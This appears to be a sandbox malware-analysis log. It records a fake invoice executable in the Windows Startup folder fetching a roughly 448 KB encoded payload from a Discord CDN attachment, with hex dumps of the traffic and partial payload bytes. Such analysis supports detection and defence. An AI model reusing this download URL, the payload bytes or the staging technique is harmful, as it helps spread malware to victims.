                                                        2023-02-22 07:36:18 UTC212INData Raw: 32 be 23 be 30 be be cf 24 be 27 be 2a be 23 be f8 be ed be ed be ed be be bf be cf 0a be 2d be 21 be 1f be 32 be 27 be 2d be 2c be be c9 04 be 27 be 2c be 22 be de be be d1 10 be 23 be 31 be 2d be 33 be 30 be 21 be 23 be ff be be cf 14 be 27 be 30 be 32 be 33 be 1f be 2a be de be be c9 ff be 2a be 2a be 2d be 21 be be cb 15 be 30 be 27 be 32 be 23 be de be be cf 0e be 30 be 2d be 21 be 23 be 31 be 31 be de be be cb 0b be 23 be 2b be 2d be 30 be 37 be be cd 0e be 30 be 2d be 32 be 23 be 21 be 32 be be c9 0d be 2e be 23 be 2c be de be be cd 0e be 30 be 2d be 21 be 23 be 31 be 31 be be cb 01 be 2a be 2d be 31 be 23 be de be be cb 06 be 1f be 2c be 22 be 2a be 23 be be cd 29 be 23 be 30 be 2c be 23 be 2a be de be be cb f1 be f0 be ec be 22 be 2a be 2a be be
                                                        Data Ascii: 2#0$'*#-!2'-,',"#1-30!#'023***-!0'2#0-!#11#+-070-2#!2.#,0-!#11*-1#,"*#)#0,#*"**
                                                        2023-02-22 07:36:18 UTC223INData Raw: 11 be 2c be 1f be 2e be 12 be 2d be 05 be 30 be 27 be 22 be be be be be e4 e2 be 32 be 26 be 27 be 31 be ec be 12 be 30 be 1f be 37 be 0a be 1f be 30 be 25 be 23 be 07 be 21 be 2d be 2c be c0 be be be d2 e2 be 32 be 26 be 27 be 31 be ec be 07 be 21 be 2d be 2c be c2 be be be d6 e2 be 32 be 26 be 27 be 31 be ec be 0a be 2d be 21 be 29 be 23 be 22 be 81 c7 be be da e2 be 32 be 26 be 27 be 31 be ec be 02 be 30 be 1f be 35 be 05 be 30 be 27 be 22 be 83 c7 be be ea 2e be 30 be 2d be 25 be 30 be 23 be 31 be 31 be 00 be 1f be 30 be ef be ec be 0b be 2d be 22 be 27 be 24 be 27 be 23 be 30 be 31 be 85 c7 be be e0 e2 be 32 be 26 be 27 be 31 be ec be 0a be 2d be 21 be 1f be 2a be 27 be 38 be 1f be 20 be 2a be 23 be 22 c8 be be da e2 be 32 be 26 be 27 be 31 be ec be
                                                        Data Ascii: ,.-0'"2&'1070%#!-,2&'1!-,2&'1-!)#"2&'1050'".0-%0#110-"'$'#012&'1-!*'8 *#"2&'1
                                                        2023-02-22 07:36:18 UTC239INData Raw: 95 4f 51 9b c0 35 05 bd 7b b3 73 79 aa 54 fb b6 f7 65 4c 73 5e 58 8b 46 84 49 99 93 c3 a1 7a c4 05 f6 3d 4d 07 b9 9d 52 ee 71 25 df ef 3c 0b 5a 9d b2 90 e0 a1 66 18 33 54 0d 9c b3 4c dd f2 9c a4 28 81 08 4c ec c3 db 6d 3d e6 29 09 8a c1 b6 95 d8 58 e7 fb b6 c2 e1 22 7a a0 22 1f 32 ad dd 61 bf eb ba 01 e2 af 88 ef 6f a2 1e 56 e9 f9 b6 26 a0 82 92 20 63 f9 89 5d 50 75 c5 5f 93 2d 65 16 7f a1 dc 60 a8 9e 20 2e c9 29 2d e0 1e 6d 0b a3 4f e9 a5 d7 6e 6e 99 43 8f 4d d4 f8 ef e1 df b4 c5 a4 c9 1b 97 09 e9 ff 1e e4 6e e5 c0 29 2d 5b ae fe 38 a9 2e 73 a0 b6 e4 e2 fb 8e d8 43 46 53 4d c4 3a a6 24 23 d5 d4 e4 9a 58 f2 91 3b b7 91 49 39 cb 91 f0 f6 0f 43 d1 08 42 58 3f ab 14 5b 46 3f 4c f4 38 23 52 a4 a7 ab b4 3a 67 11 42 b2 b1 44 cd e4 c3 4f 49 d0 9a 18 a6 57 9a 9f
                                                        Data Ascii: OQ5{syTeLs^XFIz=MRq%<Zf3TL(Lm=)X"z"2aoV& c]Pu_-e` .)-mOnnCMn)-[8.sCFSM:$#X;I9CBX?[F?L8#R:gBDOIW
                                                        2023-02-22 07:36:18 UTC255INData Raw: b5 ea 43 2e 7a 0d fb 5b b0 e9 1c 7f 02 01 37 a4 c0 35 b1 2f 69 fb 2f 75 ea 86 0a 0a 16 1b 36 7f 81 3d 59 69 42 cb 42 32 b6 2a 64 7b 63 f2 e8 16 e3 c4 ae 91 75 2c 33 db a5 9a dd a1 30 63 03 79 c8 5e 27 5a 4e f0 dd c9 fe c5 77 a1 54 b4 9c b4 69 eb a0 81 2c 45 a4 08 4a 3f de 50 58 1c af d7 30 ef ee 6e 69 d4 c8 2d c9 ed ec f2 79 2d ca 18 06 fd aa 56 3f 83 2b e0 fa 4c 56 c2 3a 1e fb bd e3 0d 09 28 74 b4 29 8e 7b 73 56 07 87 f3 57 c5 ae 16 48 cb 32 96 0a 75 02 bd 49 19 1b 11 59 59 4b 7b fe 0b ad 76 27 4b cf 8c 06 c6 d1 ba 1a 91 ff 4f 51 08 e5 cc 01 65 b4 b6 3a 3a 80 70 4e 01 7c ae ba 8c 70 e6 87 8f 74 15 a3 76 3e c6 44 ab 62 42 c3 c7 c7 83 a2 f3 fe fe 1d e2 5b 29 bd 82 5b 3e d1 9b 60 08 f7 46 a4 28 ec 71 a6 b2 e5 54 92 c6 d8 2d a6 07 f0 a7 3c 9f 63 f7 b6 06 7e
                                                        Data Ascii: C.z[75/i/u6=YiBB2*d{cu,30cy^'ZNwTi,EJ?PX0ni-y-V?+LV:(t){sVWH2uIYYK{v'KOQe::pN|ptv>DbB[)[>`F(qT-<c~
                                                        2023-02-22 07:36:18 UTC271INData Raw: 40 4f 07 52 54 e2 89 c7 be 84 1e d5 c4 ac e2 e0 86 12 a9 a6 b4 d2 d0 17 36 a5 15 58 cf 65 6b 1d a3 04 2d 6a 17 a0 d7 7c 17 57 f2 52 ce 4b 6b 69 c9 8a 57 15 97 ec 98 0e 6a b9 03 67 44 47 94 dc b6 bd 88 14 f3 4d ab 5c 40 79 09 81 d2 2a 66 e5 c6 f1 fb e8 3b 7f da fd b5 a8 c9 c1 44 86 2a 5d 9b be 42 77 7f 87 8d 42 7e 5d a5 9e f5 b9 6a af 5c f5 62 47 43 26 8a 06 af d1 0d 34 cc 2d 67 8a ea 25 05 fd 04 4f 87 49 aa 98 20 80 68 67 65 13 d7 5a 3c 57 c9 4e b3 61 d7 cb 44 ed 1b 0d 14 08 1a 06 c5 77 a8 05 4c ed ba 8a 18 f5 c9 f7 c3 ec d3 7f 09 79 b0 53 dd 6c b9 34 ca 9a ec b3 25 04 b3 50 c2 56 29 d5 0f 4a 66 c4 0b 61 4b 75 dd 0d 30 38 f8 e1 d5 4f 78 04 cc 27 5c 33 e6 e7 c0 c7 e0 f2 cf a1 e4 54 d5 ce a9 d9 4a 64 92 9a 0a 32 a7 25 0d 4b 8f 51 86 6c 69 54 de 54 3f ef 5e
                                                        Data Ascii: @ORT6Xek-j|WRKkiWjgDGM\@y*f;D*]BwB~]j\bGC&4-g%OI hgeZ<WNaDwLySl4%PV)JfaKu08Ox'\3TJd2%KQliTT?^
                                                        2023-02-22 07:36:18 UTC287INData Raw: 35 46 16 61 74 64 5b 40 45 f7 16 03 e8 6e 03 b1 81 55 64 d8 be 4b 6c 12 41 a2 52 6f af 52 8c af 99 9c c8 9a d2 17 5c d1 69 8b 25 db c1 56 69 39 85 ad b4 44 b9 2c 77 d6 61 65 68 b9 c6 ab 17 d7 ea 72 23 fe 4d 55 7b 46 a8 88 1a f3 8a 2d 4f 4e ea 9b be 57 64 32 be 7a 52 a2 69 50 7d f8 f3 3f fa fb 77 fd f7 f1 25 12 87 51 68 bb dd e8 78 85 3b 49 16 07 71 fa 20 87 b6 e0 81 8e 10 07 6d ce 8b 6f 7f 20 07 32 ec b8 79 b7 82 f7 7f dc d9 57 d8 d4 e1 2c 22 c3 2c 89 ac db 5c ff f2 60 1b ca 29 37 09 27 29 21 c7 60 5d f9 ed bf f8 53 aa cf 21 8a f3 1f 38 d3 ac c4 6c ba 1a c7 26 36 49 ed 9a 7b c4 ff fb cf 43 63 63 48 9a a7 b5 9a 59 c5 65 31 c9 af 2c 1b 7a 4b 4b 20 72 eb b1 6f 5b e4 0b 2e 76 ef b7 c0 f4 98 67 ba 25 df 26 3b 20 bf a3 b8 2e e8 b0 05 80 ad 9d 6f db 85 49 cc 0f
                                                        Data Ascii: 5Fatd[@EnUdKlARoR\i%Vi9D,waehr#MU{F-ONWd2zRiP}?w%Qhx;Iq mo 2yW,",\`)7')!`]S!8l&6I{CccHYe1,zKK ro[.vg%&; .oI
                                                        2023-02-22 07:36:18 UTC303INData Raw: b7 aa 0f 3d 86 62 16 af c7 53 50 ef cf 2d 5b 4c f5 58 ed a6 ef a9 f6 29 f8 03 00 bf 50 da c4 7f 11 fc 08 89 fc 1f 96 28 85 69 01 cc f7 f7 dd 0e 33 26 50 f0 de 2a f6 5d 87 bb ab a0 97 6d 0d 55 d9 53 31 c9 f6 66 58 ba b9 b0 7a d3 62 22 40 49 65 0e 48 70 1d b0 30 36 d7 bb 74 df bf 72 04 8b 7d 2e 87 e4 ea d5 b3 71 2e 89 06 2b 7c fb 4f 0b 85 d0 d9 95 f2 22 7d 73 c5 e0 b8 8c 35 f3 ad d8 73 55 1b 9a c6 a8 01 f2 40 83 d1 6a 5a 98 71 40 c1 3d a2 64 2b be 80 1a 8e 56 f0 01 3e 37 fe 7c 50 43 c7 1e b1 f3 05 4b 14 76 dc 14 02 d0 e2 72 7a af f6 cc 54 08 04 51 e8 e3 e9 f9 42 63 07 44 bc d1 6c 28 4f 19 68 b1 35 bf 4a 50 f5 11 c8 d3 13 03 e0 d6 bd 12 f1 7f cf 6a 8b c0 a8 42 a4 e1 be 7b d9 b5 c5 3d 67 5b 40 e1 f3 c7 95 a2 54 b6 74 97 1f 28 2c eb 29 4e b0 cd e9 24 66 48 09
                                                        Data Ascii: =bSP-[LX)P(i3&P*]mUS1fXzb"@IeHp06tr}.q.+|O"}s5sU@jZq@=d+V>7|PCKvrzTQBcDl(Oh5JPjB{=g[@Tt(,)N$fH
                                                        2023-02-22 07:36:18 UTC319INData Raw: 8d ed 49 2c 9f 82 4d b2 cb 2e fd 73 7f ab 39 44 24 77 80 3c 60 f8 2c b3 d6 5f 6c e5 26 a8 9c 7b e3 1b ae 74 a3 56 dc a3 62 1c b6 63 ec 60 e2 7b fe bc c0 03 70 ad ce 44 ce f0 76 d6 10 71 08 27 bb a4 d4 ed 32 87 85 43 53 08 f6 01 75 f4 2b cd 36 59 62 42 c4 40 99 0d d4 d5 4b 72 7f 1a b8 5b e1 9b ad e1 0d d9 cf bd e5 b5 67 80 91 24 b8 4a a2 fa 2e 73 22 60 82 fa 25 9d d9 ac 6a ca 8d 25 6a 4b e3 6c e2 5d 7f 3a 9d ff 7e b0 c6 94 ef 1b 64 bf 32 1e e4 9e f2 4f 2d 07 64 89 e3 4c 19 89 d4 fe ff ad 12 08 18 21 c6 96 d8 9f f7 b7 93 25 28 bb 51 1d 93 10 1a d4 41 0f db c9 63 59 d3 32 f0 16 cd 82 60 23 bd 7b 25 40 39 59 cb 11 ce d9 37 e3 41 ec 5a 99 39 82 97 ce 65 74 3e 74 e4 59 a3 c5 84 11 00 be 0b 89 06 16 b4 fa bf 7a 9c c2 18 85 b3 41 5e e1 33 39 0b 47 eb 05 85 1d 8a
                                                        Data Ascii: I,M.s9D$w<`,_l&{tVbc`{pDvq'2CSu+6YbB@Kr[g$J.s"`%j%jKl]:~d2O-dL!%(QAcY2`#{%@9Y7AZ9et>tYzA^39G
                                                        2023-02-22 07:36:18 UTC335INData Raw: 3d 29 22 22 df 5c da b8 5c 17 34 78 ec b7 36 6a 1d 3e 9d 8f df 0c f3 e8 98 58 06 87 24 c8 c7 a7 7d ac 6c 61 03 fc a8 ae 6b 8c cb fd 9a e6 36 f1 b0 4a 4a fc 98 e1 f3 a6 f5 0d 2c 88 a2 43 11 98 be 2c 8a 0a fa ab 39 d1 cf ff f8 0c fc 28 66 25 a1 f1 cc 6b 01 79 97 56 2a 0a 0b 0e 46 ea 7e 2d b9 72 6b ee 1b ce 10 28 36 44 24 2d 41 f2 2f 21 7b 67 eb 76 62 85 80 73 06 73 e5 69 0d 83 ab b4 ce cf 82 27 71 89 ad a5 c7 f0 f8 09 0b 58 21 c4 c1 80 97 84 20 76 01 2f 8a 32 32 2e ef ef 1f bd a2 ca 42 91 1a 8b 34 4b bb f2 ad 97 d4 1c 40 8d 65 c3 04 b5 58 89 a8 19 c9 c7 af b5 1a f1 78 64 d5 c9 f2 f9 3f bf 97 2c 84 50 aa f8 81 59 ae ab 9e 16 63 0c 1f 26 cc 5a 6f d7 20 48 64 61 0c a7 1d 7f 82 5d 47 75 53 d4 c6 7f ae f9 88 ac 49 3e 70 48 c4 c9 a5 2e 15 45 f6 73 4b af d8 53 6e
                                                        Data Ascii: =)""\\4x6j>X$}lak6JJ,C,9(f%kyV*F~-rk(6D$-A/!{gvbssi'qX! v/22.B4K@eXxd?,PYc&Zo Hda]GuSI>pH.EsKSn
                                                        2023-02-22 07:36:18 UTC351INData Raw: 18 b4 41 76 a9 01 0c f1 59 f3 12 d3 56 c8 b8 09 2e d1 05 24 cd db ad ff 7c ec a0 f8 74 7c 14 4b 3a 0c 57 1e fe 6c 25 53 74 79 aa f3 06 37 22 64 bc 33 e8 ac 71 74 17 f9 a6 7c d7 f3 b0 e3 4c 1c 64 9e c5 93 3b 37 4c 24 74 54 60 26 ec 21 45 b6 7a d0 c6 b5 30 89 c1 08 d1 76 2d 48 f5 e6 47 8c 15 1f 12 1d 32 23 b3 3c e6 44 06 5a 88 9e ea d4 5c 47 bc e0 fb 0b 33 83 95 86 9c 46 5f c1 60 bb 30 71 0d 67 04 ab e0 eb 0f ef 9b b1 73 22 1a 55 e1 08 1c ef 08 5c a5 01 17 af 46 41 5b f0 73 1b 2d b7 7c e5 37 d5 79 cf d9 16 59 f2 41 b7 1e 06 88 f2 05 33 c6 67 dd 78 34 ec 31 00 54 75 96 d9 44 b7 89 f5 34 10 fe 1c 23 12 bc 4e 96 b6 70 cd 50 21 ac 3c 56 5a 31 67 85 dd 36 9c 8e 73 c4 86 d3 b6 7b b2 e7 be 02 6a 55 a7 39 77 5b d3 c1 8e a7 d1 77 5a 31 ed ac 86 0b 19 33 f5 c2 78 0a
                                                        Data Ascii: AvYV.$|t|K:Wl%Sty7"d3qt|Ld;7L$tT`&!Ez0v-HG2#<DZ\G3F_`0qgs"U\FA[s-|7yYA3gx41TuD4#NpP!<VZ1g6s{jU9w[wZ13x
                                                        2023-02-22 07:36:18 UTC367INData Raw: 0d e1 73 00 b2 f0 0a 7b c9 13 6e b7 55 a6 03 5c 67 f1 1c 0f 5a cf f6 c0 6d 74 76 72 36 21 ad 23 f6 cc 58 7b 16 3b 1d 19 39 e0 d5 db 6f 2f 8c 61 a5 3d 2c 3d 61 25 8b 70 f2 8b 50 56 44 e3 ab 93 e7 c6 96 fd 1d ba c8 ec cc 7f de 92 2c 33 6b 34 3c 81 5a a4 ec 70 54 48 07 ac e2 5f a1 47 54 cb fd 96 f6 32 df 8a 91 0d 76 18 df 52 ff 1b 4b 5c d4 43 fe 5d d5 c9 3d a0 8c db c2 ea 71 ad 7d 14 cf 42 cb ce ce c1 81 4b 6c be ea 6d 0f f1 a9 f7 18 18 76 a4 d1 66 2c 1a d5 bc 66 dd fb c9 07 c1 ef 45 f7 f3 fc d0 dd a7 8e cb 76 57 11 e5 51 15 f4 3b cb 3e c6 57 09 47 bb 91 85 eb 44 e3 8b b5 01 ff 52 d4 4a 8f ff 85 f7 c4 42 29 9a 43 88 a5 17 2f 0b 27 41 d0 99 0f 7f 33 e3 32 f3 46 55 80 e0 65 b6 02 74 0a d6 fa 07 df 03 36 4c 1b f2 2d 77 9b a9 85 38 5c 57 f6 17 96 73 72 18 59 e0
                                                        Data Ascii: s{nU\gZmtvr6!#X{;9o/a=,=a%pPVD,3k4<ZpTH_GT2vRK\C]=q}BKlmvf,fEvWQ;>WGDRJB)C/'A32FUet6L-w8\WsrY
                                                        2023-02-22 07:36:18 UTC383INData Raw: f7 10 c5 a0 ab a7 ba 22 c3 96 c3 c5 7b 54 8c 11 b5 d8 27 b0 58 0a b0 f6 fe 5f 96 f9 dd dd ce 5c f9 68 28 23 a1 6e 09 d5 be 7d cb 04 e5 76 bc 2d 36 56 84 33 be 65 4d 6a 21 30 f2 18 09 84 f5 4c 4f ae 1e 9d f2 12 f9 ab 71 ba 51 b5 9c 44 39 25 07 ee c2 6d 2c 11 36 d5 f9 76 fb 3e 74 91 d9 18 fe 3f b9 02 65 94 bf 98 fd a2 4f 87 9d 8d f4 50 a5 05 a3 a2 41 e7 8e d1 65 59 3f 27 3c c0 27 7e 1b e7 67 b1 34 e8 e7 ac 49 5a e4 3a fb 91 26 b3 2f 07 a7 ff 86 2e 8b 1b f4 ba 76 27 4b 5f 4f 46 ce 4c c1 34 18 a2 1a 62 b5 c9 c5 f3 2f 53 73 bf bb cb 17 30 76 1f e2 9b 95 3d 21 6f 23 37 2e 9f 23 8c 57 d3 de 61 f7 15 7b f8 47 48 21 f8 36 e1 15 bc c9 dd 1c c6 b3 84 ac 23 ca e5 98 7a 7d fc 0d 33 4d 56 05 fa 76 24 19 71 b9 e6 ce f4 18 69 b1 5d 1e a1 de dd 4f f1 e6 d2 b7 cb 00 4a ba
                                                        Data Ascii: "{T'X_\h(#n}v-6V3eMj!0LOqQD9%m,6v>t?eOPAeY?'<'~g4IZ:&/.v'K_OFL4b/Ss0v=!o#7.#Wa{GH!6#z}3MVv$qi]OJ
                                                        2023-02-22 07:36:18 UTC399INData Raw: d5 a1 10 dd 25 54 ed 97 1a dc 3b 7b 5b 04 4b fc c9 20 6d 1d 13 d4 01 85 4b 1d d7 cb d2 c3 a4 79 e1 87 23 26 aa df 7d e4 2f c2 e5 88 27 ce 13 12 f7 44 e5 70 0f e6 20 dd 78 89 f2 d8 7b 8a 19 d3 19 04 2b 2a 3e 07 3c 78 92 d3 71 bf 2a c5 03 2e b4 4d 1e ca 7b 22 10 03 1c 72 1b e5 5e df 6c 07 73 7c f8 dc 6d 39 03 70 54 e8 d1 7a a2 c6 ca c2 a1 82 81 fb fc 50 7e 9b 5d 16 82 bd 71 89 d9 f1 3b 58 72 97 d6 aa 94 55 86 80 15 a2 9c e6 e7 c1 27 5e 1b 2c a8 c8 19 e6 81 33 9f 65 ca ef 68 42 5e 33 94 79 0f 83 62 66 34 f0 9a 07 d5 38 07 a5 8b 7d a8 27 85 33 de 3a 73 9f 6f 6e 7e d6 29 0a 10 9f 46 d9 b4 2f 0e 28 14 44 f8 6b 11 7e 06 93 27 e1 92 af a2 bd 1a fe 91 a5 1b 4b 0f f4 e9 e6 97 03 00 1d f3 4b fc c3 c9 e7 c5 97 97 93 ae cf 07 29 aa c7 3b d5 68 73 cf 97 4d 8c 77 69 89
                                                        Data Ascii: %T;{[K mKy#&}/'Dp x{+*><xq*.M{"r^ls|m9pTzP~]q;XrU'^,3ehB^3ybf48}'3:son~)F/(Dk~'KK);hsMwi
                                                        2023-02-22 07:36:18 UTC415INData Raw: 63 b4 a8 5f 05 bf 3a 14 4a c9 d1 09 fb 4a e6 96 33 9a bf f6 e5 8e dc e1 43 c7 c0 0a 8b 4c 86 d0 ac 37 06 24 56 56 9e 21 6e 60 3e 7f 5f 4b 69 4d 06 b2 e3 a2 73 d2 94 d0 1c 9f f3 5f a4 8d 1a e2 71 95 52 7a fb 95 e1 90 92 35 fe 9f 16 11 13 72 82 d9 e5 40 f8 72 79 9b e3 b4 14 4a df 6a e8 eb 4f 3e 53 ff 01 7a 0d 93 a9 29 82 30 23 40 ff 1c c2 f5 d5 02 3a 77 82 c1 77 fa d3 ca ba 27 82 40 88 2f 47 20 4d 81 fb d3 99 aa 39 9d 87 04 82 d5 25 4a 3f a7 49 47 df a1 2d 7e d0 13 f3 57 f6 e5 56 ea ee d5 72 68 47 36 c3 f9 74 f6 b4 1a 04 af b8 7c 9d c2 c6 cf c4 83 f4 a6 d6 8c ce e8 67 7b e2 fc 31 f4 ab d7 e2 41 ee c9 9c 25 b9 1c 9f ed c5 b7 cc 38 f6 ff d0 d7 a8 42 41 a0 53 a2 2f 1f b8 c5 93 34 33 07 1b 1e f7 57 92 e9 2e 32 d2 15 57 e1 c9 e5 df d4 a6 f0 7e 03 1a f6 72 19 da
                                                        Data Ascii: c_:JJ3CL7$VV!n`>_KiMs_qRz5r@ryJjO>Sz)0#@:ww'@/G M9%J?IG-~WVrhG6t|g{1A%8BAS/43W.2W~r
                                                        2023-02-22 07:36:18 UTC431INData Raw: 8d 8c 8b a8 9e 80 76 84 85 b5 84 b0 b7 98 8f 8f 9d b1 9c b8 82 90 8f 90 95 60 94 92 46 68 5f 6c 6d 59 6c 7a 76 60 6b 67 65 5b 64 72 69 78 7b 76 7d 74 7b 7a 7b 70 6f 6e 75 3e 73 50 44 48 47 4b 4d 78 4b 4a 4d 40 b2 40 45 7d 43 42 59 58 aa 5c 5d 67 5c 4a 71 50 5b 57 55 6c 54 42 2e 28 2f 2d 2d dd 2c 18 39 20 33 27 25 0a 24 10 16 38 2f 2f 3d 2c 3c 2a 31 30 15 2e 35 c5 33 32 09 08 0b 0b 0d f8 0c 28 1f 00 03 04 05 3c 04 20 01 18 31 1c 1d 10 1c 28 2f 10 1b 17 15 3d 14 12 c6 e8 e3 ea ed ec eb ea e1 e0 f3 e4 e5 d1 e4 f2 e1 f8 0a fa fd 0d fc c8 e9 f0 e3 f7 f5 da f4 c0 e6 c8 bf bf cd dc cc da c1 c0 32 be c5 3d c3 c2 d9 d8 ed dc dd ea dc da c6 d0 22 d0 d5 ed d3 c2 8d a8 9f 9f ad 85 ac 88 7f a0 a7 a4 a5 95 a4 a2 ac b8 b3 af bd 83 bc aa a9 b0 85 b4 b5 b1 b4 b2 89 88 9b
                                                        Data Ascii: v`Fh_lmYlzv`kge[drix{v}t{z{ponu>sPDHGKMxKJM@@E}CBYX\]g\JqP[WUlTB.(/--,9 3'%$8//=,<*10.532(< 1(/=2="


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.549705162.159.129.233443C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2023-02-22 07:36:37 UTC439OUTGET /attachments/1072614287295660156/1076965214899146822/702 HTTP/1.1
                                                        Host: cdn.discordapp.com
                                                        Connection: Keep-Alive
                                                        2023-02-22 07:36:37 UTC439INHTTP/1.1 200 OK
                                                        Date: Wed, 22 Feb 2023 07:36:37 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 448000
                                                        Connection: close
                                                        CF-Ray: 79d60d41ba2c9b3d-FRA
                                                        Accept-Ranges: bytes
                                                        Age: 5700
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Disposition: attachment;%20filename="702"
                                                        ETag: "c70f9ed1fad97dc6f835a513035e4f76"
                                                        Expires: Thu, 22 Feb 2024 07:36:37 GMT
                                                        Last-Modified: Sun, 19 Feb 2023 20:35:16 GMT
                                                        Vary: Accept-Encoding
                                                        CF-Cache-Status: HIT
                                                        Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        x-goog-generation: 1676838916362263
                                                        x-goog-hash: crc32c=fBnM8Q==
                                                        x-goog-hash: md5=xw+e0frZfcb4NaUTA15Pdg==
                                                        x-goog-metageneration: 1
                                                        x-goog-storage-class: STANDARD
                                                        x-goog-stored-content-encoding: identity
                                                        x-goog-stored-content-length: 448000
                                                        X-GUploader-UploadID: ADPycduTJsPXTkWiE0wd4Ze4ubJE7MaDcFpo9LYmevAk-Padjll52x-XREaW6UvNUqpfKIERoZE3uB5H-5VqMozXJpQqjcz3oSND
                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                        Set-Cookie: __cf_bm=GVX1wsHIeSY81Io_ltMgQGPAapNgm_XjVP64IJzACTU-1677051397-0-Aa0ZbfzRAbKGyvM4cgFUm9J3+bXePE3nn/hLQNDkYmxz/IT9yzFmTtGCqPcFqEsetpzKDSWdAOW+8wwyPN1/IxE=; path=/; expires=Wed, 22-Feb-23 08:06:37 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                        2023-02-22 07:36:37 UTC440INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 73 7a 47 30 78 46 4f 75 42 43 45 67 68 57 42 71 6d 64 42 37 75 47 71 4f 32 36 58 43 64 4a 56 32 49 72 33 48 54 50 59 64 4e 54 35 49 49 76 41 25 32 46 25 32 42 49 78 71 71 4e 56 7a 31 73 35 38 44 4a 41 63 76 6c 74 67 25 32 42 32 66 74 38 48 36 32 4d 53 25 32 46 77 4e 39 79 25 32 46 32 43 72 57 54 4d 52 58 72 43 78 50 77 69 4f 44 6e 25 32 42 38 5a 6e 6a 25 32 46 38 4e 32 62 55 56 52 55 50 54 62 70 50 4f 77 62 55 41 5a 36 53 71 48 62 43 51 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d
                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=szG0xFOuBCEghWBqmdB7uGqO26XCdJV2Ir3HTPYdNT5IIvA%2F%2BIxqqNVz1s58DJAcvltg%2B2ft8H62MS%2FwN9y%2F2CrWTMRXrCxPwiODn%2B8Znj%2F8N2bUVRUPTbpPOwbUAZ6SqHbCQw%3D%3D"}],"group":"cf-nel","m
                                                        2023-02-22 07:36:37 UTC440INData Raw: 0b 18 4e be c1 be be be c2 be be be bd bd be be 76 be be be be be be be fe be be be be be be be be be be be be be be be be be be be be be be be be be be be be be be be be be be be 3e be be be cc dd 78 cc be 72 c7 8b df 76 bf 0a 8b df 12 26 27 31 de 2e 30 2d 25 30 1f 2b de 21 1f 2c 2c 2d 32 de 20 23 de 30 33 2c de 27 2c de 02 0d 11 de 2b 2d 22 23 ec cb cb c8 e2 be be be be be be be 0e 03 be be 0a bf c1 be df 3b b0 21 be be be be be be be be 9e be cc df c9 bf c6 be be 8c c4 be be c4 be be be be be be ec ab c4 be be de be be be be c5 be be be fe be be de be be be c0 be be c2 be be be be be be be c2 be be be be be be be be fe c5 be be c0 be be be be be be c1 be fe 43 be be ce be be ce be be be be ce be be ce be be be be be be ce be be be be be be be be be be
                                                        Data Ascii: Nv>xrv&'1.0-%0+!,,-2 #03,',+-"#;!C
                                                        2023-02-22 07:36:37 UTC441INData Raw: 2b bf be c2 f8 6f bc bd bd e4 f6 65 bc bd bd d5 d1 c2 f6 dc be be be d0 c1 e6 c8 be be c8 d1 be de c8 be be be 3c ff bf be c2 f8 49 bc bd bd e4 f6 3f bc bd bd f6 6d bd bd bd f6 be be be be d4 d1 c2 de c7 be be be bc cc c8 be f6 24 bc bd bd cf be 33 bf be be bf e6 c9 be be c8 cf bf bc c0 d1 c6 f6 7a bc bd bd cf bf 2a e1 ba de 0c 0d 6d 21 d2 77 bc bf d1 ca f6 94 bc bd bd cf bf de 3a 96 c9 be 16 d1 bf f6 9a bd bd bd d4 d1 c2 de c5 be be be 3c 38 bf be c2 f7 db bc bd bd e4 f6 d1 bc bd bd cf bf cf bf de 80 7b c3 be 19 de 80 7b c3 be 18 cf bf 1f 16 d1 bf f6 f8 bc bd bd f6 72 bc bd bd de c4 be be be f6 ab bb bd bd dd 1e d1 bf f6 f0 be be be cf c3 32 bf be be d9 cf c4 32 d7 be be bf d4 d6 2d ca be be c8 52 d1 c5 de bf be be be 3c 32 bf be c2 f8 7b bb bd bd e4 de
                                                        Data Ascii: +oe<I?m$3z*m!w:<8{{r22-R<2{
                                                        2023-02-22 07:36:37 UTC443INData Raw: c2 f7 fe bd bd bd e4 f6 f4 bd bd bd e6 e5 be be c4 f6 2a bd bd bd e8 be be d1 ee c4 be 7c be be be c4 be be cf f6 e6 be be be bc ca bf be 03 c0 be be be e2 be be be 1e be be be f6 dd be be be cf be 32 e4 be be bf e6 dd be be c4 e4 f6 ca be be be 31 d8 be be c8 d1 be f6 1d be be be e8 cf be 33 e4 be be bf d9 4b bf be be bf e3 d4 e6 2a bf be c4 60 e3 d5 c0 60 e3 d6 e6 2b bf be c4 60 e3 d7 c1 60 e3 d8 e6 2c bf be c4 60 e6 d9 be be c8 2d da be be c8 f6 63 bd bd bd cf be 32 e4 be be bf d5 2d db be be c8 de be be be be 3c 18 bf be c2 f8 35 bd bd bd e4 f6 2b bd bd bd cf be 33 e4 be be bf e6 29 bf be c4 e6 dc be be c4 de bf be be be 3c ff bf be c2 f8 0f bd bd bd e4 f6 05 bd bd bd be be d1 ee c3 be 07 bf be be c5 be be cf de c1 be be be bc cc c2 be f6 be be be be
                                                        Data Ascii: *|213K*``+``,`-c2-<5+3)<
